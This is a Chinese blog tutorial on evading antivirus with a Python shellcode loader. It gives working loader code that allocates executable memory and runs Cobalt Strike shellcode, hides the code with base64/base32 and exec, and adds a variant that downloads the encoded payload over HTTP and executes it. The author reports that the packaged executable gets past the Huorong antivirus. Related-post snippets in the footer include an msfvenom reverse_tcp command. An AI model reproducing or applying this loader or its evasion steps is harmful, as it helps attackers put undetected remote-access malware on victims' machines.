基于python的简单免杀

已于 2023-11-21 14:02:56 修改
阅读量1.9k 收藏
点赞数 4
文章标签: 安全 web安全 python
于 2023-11-21 12:00:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76232299/article/details/134527297
版权

前言

        本次文章只用于技术讨论,学习,切勿用于非法用途。

开篇

先简单的了解一下shellcode和loader

shellcode是一段用于利用软件漏洞而执行的代码

shellcode loader是用来运行此代码的加载器

这两个是缺一个都不行的

shellcode我们使用cs生成payload

 接下来我们在网上找一段随处可见的shellcode loader

import ctypes
import base64
def shellCodeLoad(shellcode):
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
if __name__ == "__main__":    
    buf = b"\xfc\......"

常见的shellcode loader 的思路就三步:

  1. 为shellcode开辟内存空间
  2. 将shellcode载入这段内存空间
  3. 执行这段内存空间

现在把py放到火绒中是百分百被查出来的

接下来我们对特征码进行加密

先写一个encode.py进行加密

import base64
import sys

f = open(sys.argv[1])        # 打开指定的文件,文件名是通过命令行传入的第一个参数
t = f.read()

encoded = base64.b64encode(base64.b32encode(t.encode('UTF-8')))
print(encoded)

f.close()

测试一下

没有问题 

我们使用exec来执行代码

我们先修改一下shellcode loader

from base64 import b64encode

code = '''def shellCodeLoad(shellcode):
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))'''

进行base64加密

 那我们执行的时候写的代码就是

exec(b64decode('ZGVmIHNoZWxsQ29kZUxvYWQoc2hlbGxjb2RlKToKICAgIGN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jLnJlc3R5cGUgPSBjdHlwZXMuY191aW50NjQKICAgIHB0ciA9IGN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jKGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KGxlbihzaGVsbGNvZGUpKSwgY3R5cGVzLmNfaW50KDB4MzAwMCksY3R5cGVzLmNfaW50KDB4NDApKQogICAgYnVmID0gKGN0eXBlcy5jX2NoYXIgKiBsZW4oc2hlbGxjb2RlKSkuZnJvbV9idWZmZXIoc2hlbGxjb2RlKQogICAgZXZhbChiYXNlNjQuYjY0ZGVjb2RlKCJZM1I1Y0dWekxuZHBibVJzYkM1clpYSnVaV3d6TWk1U2RHeE5iM1psVFdWdGIzSjVLR04wZVhCbGN5NWpYM1ZwYm5RMk5DaHdkSElwTEdKMVppeGpkSGx3WlhNdVkxOXBiblFvYkdWdUtITm9aV3hzWTI5a1pTa3BLUT09IikpCiAgICBoYW5kbGUgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZChjdHlwZXMuY19pbnQoMCksY3R5cGVzLmNfaW50KDApLGN0eXBlcy5jX3VpbnQ2NChwdHIpLGN0eXBlcy5jX2ludCgwKSxjdHlwZXMuY19pbnQoMCksY3R5cGVzLnBvaW50ZXIoY3R5cGVzLmNfaW50KDApKSkKICAgIGN0eXBlcy53aW5kbGwua2VybmVsMzIuV2FpdEZvclNpbmdsZU9iamVjdChjdHlwZXMuY19pbnQoaGFuZGxlKSwgY3R5cGVzLmNfaW50KC0xKSk=').decode())

处理好了shellcode loader,接下来处理一下shellcode

shellcode = bytearray(b'\xfc\......')

我们使用上面写的encode.py进行加密

python encode.py payload.py

 然后我们把他保存在一个shellcode.txt的文件中

准备好shellcode,shellcode loader我们组装在一起

from base64 import b32decode, b64decode, b64encode
import ctypes
import base64



f = open('D:/python1/py/111/loader/2/shellcode.txt')        # 从shellcode.txt中读取shellcode,进行解密
code = f.read()

code = code.encode()
code = b32decode(b64decode(code))
f.close()
exec(code.decode())

exec(b64decode('ZGVmIHNoZWxsQ29kZUxvYWQoc2hlbGxjb2RlKToKICAgIGN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jLnJlc3R5cGUgPSBjdHlwZXMuY191aW50NjQKICAgIHB0ciA9IGN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jKGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KGxlbihzaGVsbGNvZGUpKSwgY3R5cGVzLmNfaW50KDB4MzAwMCksY3R5cGVzLmNfaW50KDB4NDApKQogICAgYnVmID0gKGN0eXBlcy5jX2NoYXIgKiBsZW4oc2hlbGxjb2RlKSkuZnJvbV9idWZmZXIoc2hlbGxjb2RlKQogICAgZXZhbChiYXNlNjQuYjY0ZGVjb2RlKCJZM1I1Y0dWekxuZHBibVJzYkM1clpYSnVaV3d6TWk1U2RHeE5iM1psVFdWdGIzSjVLR04wZVhCbGN5NWpYM1ZwYm5RMk5DaHdkSElwTEdKMVppeGpkSGx3WlhNdVkxOXBiblFvYkdWdUtITm9aV3hzWTI5a1pTa3BLUT09IikpCiAgICBoYW5kbGUgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZChjdHlwZXMuY19pbnQoMCksY3R5cGVzLmNfaW50KDApLGN0eXBlcy5jX3VpbnQ2NChwdHIpLGN0eXBlcy5jX2ludCgwKSxjdHlwZXMuY19pbnQoMCksY3R5cGVzLnBvaW50ZXIoY3R5cGVzLmNfaW50KDApKSkKICAgIGN0eXBlcy53aW5kbGwua2VybmVsMzIuV2FpdEZvclNpbmdsZU9iamVjdChjdHlwZXMuY19pbnQoaGFuZGxlKSwgY3R5cGVzLmNfaW50KC0xKSk=').decode())

shellCodeLoad(shellcode)        # 加载

我们使用pyinsatller进行打包

pyinstaller -F 文件.py

 

 我们放到火绒里试试

 这边只能在本地执行。

我们将其改为远程加载方式执行,这边要开启apache服务

from base64 import b32decode, b64decode, b64encode
import ctypes
import base64
import requests

url = 'http://0.0.0.0/shellcode.txt'
code = requests.get(url).text


code = code.encode()
code = b32decode(b64decode(code))
exec(code.decode())

exec(b64decode('ZGVmIHNoZWxsQ29kZUxvYWQoc2hlbGxjb2RlKToKICAgIGN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jLnJlc3R5cGUgPSBjdHlwZXMuY191aW50NjQKICAgIHB0ciA9IGN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jKGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KGxlbihzaGVsbGNvZGUpKSwgY3R5cGVzLmNfaW50KDB4MzAwMCksY3R5cGVzLmNfaW50KDB4NDApKQogICAgYnVmID0gKGN0eXBlcy5jX2NoYXIgKiBsZW4oc2hlbGxjb2RlKSkuZnJvbV9idWZmZXIoc2hlbGxjb2RlKQogICAgZXZhbChiYXNlNjQuYjY0ZGVjb2RlKCJZM1I1Y0dWekxuZHBibVJzYkM1clpYSnVaV3d6TWk1U2RHeE5iM1psVFdWdGIzSjVLR04wZVhCbGN5NWpYM1ZwYm5RMk5DaHdkSElwTEdKMVppeGpkSGx3WlhNdVkxOXBiblFvYkdWdUtITm9aV3hzWTI5a1pTa3BLUT09IikpCiAgICBoYW5kbGUgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZChjdHlwZXMuY19pbnQoMCksY3R5cGVzLmNfaW50KDApLGN0eXBlcy5jX3VpbnQ2NChwdHIpLGN0eXBlcy5jX2ludCgwKSxjdHlwZXMuY19pbnQoMCksY3R5cGVzLnBvaW50ZXIoY3R5cGVzLmNfaW50KDApKSkKICAgIGN0eXBlcy53aW5kbGwua2VybmVsMzIuV2FpdEZvclNpbmdsZU9iamVjdChjdHlwZXMuY19pbnQoaGFuZGxlKSwgY3R5cGVzLmNfaW50KC0xKSk=').decode())

shellCodeLoad(shellcode)

 测试一下,能不能成功

 先打包,这边也是过掉了火绒,看看能不能正常上线

 成功!!!

本文到这就结束了,思路还是蛮好理解的,还是自己太菜了,也就只能过掉火绒了😭😭😭,还是要多学阿。

是小苏耶
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pyinstaller+cs生成免杀exe过杀毒软件
AerYinan的博客
01-01 2529
项目工具 : CobaltStrike(CS) python pyinstaller 通过cs免杀: 使用cs制作免杀 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20201231170617315.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0FlcllpbmFu,size_16,color_FFFFF
python制作免杀软件教程及工具.zip
07-26
本资源会教你如何用python制作免杀软件,并提供了所需的代码工具和脚本,亲测能够过360安全卫士和火绒。
Pyinstaller生成exe文件免杀
xiaoxianerqq的专栏
02-04 1493
0x01 解决方案 之前用python打包的exe文件总会被电脑关键识别成木马文件隔离,很困扰 (虽说本来也不是做什么好事= =) 解决方案: 再生成exe文件时给生成的exe加上图标即可。 使用命令: pyinstaller -i xxxx.ico -w -F xxxx.py 0x02 ico文件生成代码 pyinstaller需要特定的后缀为.ico的图片文件来生成图标, 且对文件的大小尺寸有要求。经过查询,以下方法可以顺利生成各种大小的图标 首先安装PIL库 #fo...
免杀】分离免杀python)_shellcode loader免杀,2024年最新我了解到的面试的一些小内幕
最新发布
m0_60707263的博客
04-18 218
然后对loader和shellcode分别加密存储到别的文件中(怎么加密都行但是最后要用相对应的方式解密)将加密的数据写入到另外的文件中,loader.txt和shellcode1.txt中。先将loader和shellcode都加密。shellcode用msf生成。shellcode加密。
Python shellcode免杀
qq_25761407的博客
04-02 5474
Python shellcode免杀
免杀对抗-Python-混淆算法+反序列化-打包生成器-Pyinstall
xiaoheizi的博客
09-13 1105
1.生成或者python2.打开pycharm工具,创建一个py文件,将原生态执行代码复制进去shellcode3.将生成的shellcode放到执行代码中,运行代码,cs成功上线1.执行命令,生成shellcode命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.206.129 lport=4444 -f c2.msf设置监听3.将shellcode放到执行脚本中运行。
通过Python实现Payload分离免杀过程详解
09-16
主要介绍了通过Python实现Payload分离免杀过程详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
使用Python进行防病毒免杀解析
09-18
主要介绍了使用Python进行防病毒免杀,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
基于Python的火车票分析系统源码
05-13
基于Python的火车票分析系统源码基于Python的火车票分析系统源码基于Python的火车票分析系统源码基于Python的火车票分析系统源码基于Python的火车票分析系统源码基于Python的火车票分析系统源码基于Python的火车票...
基于python的简易物联网系统设计实现
04-07
基于python的简易物联网系统设计实现
python学习笔记——python转exe免杀
小橙子的博客
07-07 876
思路: 将敏感代码转码,使用时解码再执行。 参考: https://blog.csdn.net/qq_32261191/article/details/108994177 一、敏感代码使用base64编码 #-*- coding: utf-8 -*- import base64 str = """ print('123') """ #编码 encode = base64.b64encode(str.encode('utf-8')) print(encode) 结果: b'CnByaW50
Python常见的免杀方式
m0_62207482的博客
02-09 1125
使用pyinstaller生成的可执行文件 本身就具有一定的免杀能力,但是在与杀毒软件对抗时,部分杀毒软件也可以通 过分析可执行文件的内容来判断文件是否为恶意程序,导致这些代码仍然具有被 杀的可能。·BackDoor-factory工具,又称后门工厂(BDF),利用该工具,可以在不破 坏原来的可执行文件功能的前提下,在代码中注入恶意的shellcode攻击代码。一部分杀毒软件的API拦截操作是通过对API的前几个字节内容的 监测实现的,如果跳过了头部字节,就可以避开这种拦截方式。· 未导出API。
python加载shellcode免杀 简介
whatday的专栏
10-02 4468
前言 本文整理自小迪师傅近期课程以及本人实验时所踩的一些坑和思路。文章由浅入深,可以让你从免杀小白到免杀入门者,能够绕过火绒和360等国内主流安全软件,成功上线msf。本人也是刚接触免杀,若有说得不对的地方,欢迎大佬们及时提出指正。关于本人在实验过程中所踩的一些坑会在文中提醒大家,让大家尽量少入坑。 注:以下实验截图均为本人发稿时重新测试所截 0X00 基础概念 1. python ctypes模块介绍 ctypes是 Python的外部函数库。它提供了与 C 兼容的数据类型,并允许调用 D...
python 如何根据索引快速删除列表中的多个元素_python批量删除列表元素(2)
m0_60721823的博客
04-15 412
lis = [‘香蕉’,‘橘子’,‘火龙果’,‘梨’,‘苹果’,‘柚子’,‘csdn’]lis = [‘香蕉’,‘橘子’,‘火龙果’,‘梨’,‘苹果’,‘柚子’,‘csdn’]index_list.reverse() # 对索引进行反转,使其从后往前删除。删除后lis的值:[‘香蕉’, ‘梨’, ‘苹果’, ‘柚子’]print(‘删除后lis的值:%s’ %lis)print(‘删除后lis的值:%s’ %lis)
python免杀基础之shellcode调用
dzqxwzoe的博客
08-23 1064
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。(摘自百度)在windows中, 如果想要调用shellcode, 那肯定逃不过win32 api的调用, 如果会汇编的话那就另说了。那在这里介绍一下常用的API。函数需要查询MSDN去了解, 需要有点win32编程基础。
小王问我python怎么免杀,我沉默了......
Liyu_6618的博客
02-01 453
Python免杀Shellcode思路
使用 pyinstall 打包实现免杀后门
热门推荐
CSDN
05-28 1万+
免杀(Evasion)是指绕过或规避安全软件(如杀毒软件、防火墙等)的检测和阻止,使恶意软件、恶意代码或攻击载荷能够成功地绕过安全措施并在目标系统上执行而不被检测或拦截。免杀技术旨在使恶意软件具有更高的潜入和持久性,以避免被安全软件及时发现和清除。
免杀学习(二)python
m0_62207170的博客
01-09 539
python免杀
python免杀shellcode案例
kiihuang的博客
04-10 277
简单的病毒绕过免杀,完成加壳操作。
python shellcode免杀
06-06
Python shellcode免杀是指使用Python语言编写的shellcode可以避免被杀毒软件检测和拦截。这种技术主要是通过对shellcode进行加密、混淆、动态生成等方式来达到免杀的效果。其中,加密和混淆可以使shellcode的代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值